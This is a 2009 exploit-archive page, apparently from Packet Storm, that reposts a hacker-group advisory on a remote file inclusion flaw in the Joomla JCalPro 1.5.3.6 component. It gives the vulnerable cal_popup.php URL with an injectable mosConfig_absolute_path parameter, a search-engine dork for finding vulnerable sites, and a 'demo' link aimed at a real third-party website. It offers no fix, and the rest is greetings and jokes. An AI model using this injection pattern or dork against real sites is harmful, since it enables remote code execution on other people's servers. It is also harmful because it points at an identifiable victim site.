what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla JCalPro 1.5.3.6 Remote File Inclusion

Joomla JCalPro 1.5.3.6 Remote File Inclusion
Posted Dec 22, 2009
Authored by kaMtiEz | Site indonesiancoder.com

The Joomla JCalPro component version 1.5.3.6 Stable suffers from a remote file inclusion vulnerability.

tags | exploit, remote, code execution, file inclusion
SHA-256 | 019771cdc9d0f4653abaa803af6074c2ab657037f58a1d12093e62fc5cdce4a7

Joomla JCalPro 1.5.3.6 Remote File Inclusion

Change Mirror Download
#############################################################################################################
## Joomla Component com_jcalpro Remote FiLe include RFI ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 13 December, 2009 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.anything-digital.com
[+] Download : http://dev.anything-digital.com/jcal-pro-downloads.html
[+] version : 1.5.3.6 Stable or upper / lower maybe also affected
[+] Vulnerability : RFI
[+] Dork : inurl:"com_jcalpro"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=[INDONESIANCODER]

[ BUG ]

cal_popup.php

[ DEMO ]

http://www.perovec96.ru/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=[kaMtiEzROX]

[ FIX ]

tanya aurakasih mungkin dia tauh :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Setelah Bertapa kagak jelas ampe pagi sama Om Don Tukuesto ... dan lagi lagi akhirnya nemu lobang :D
[+] iseng2 berhadiah bugs .. omegod >.<
[+] capek juga dari surabaya .. fyuh .,.
[ QUOTE ]

[+] one day .. u will be mind .. >.<
[+] AURAKASIH u are so .. hha
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close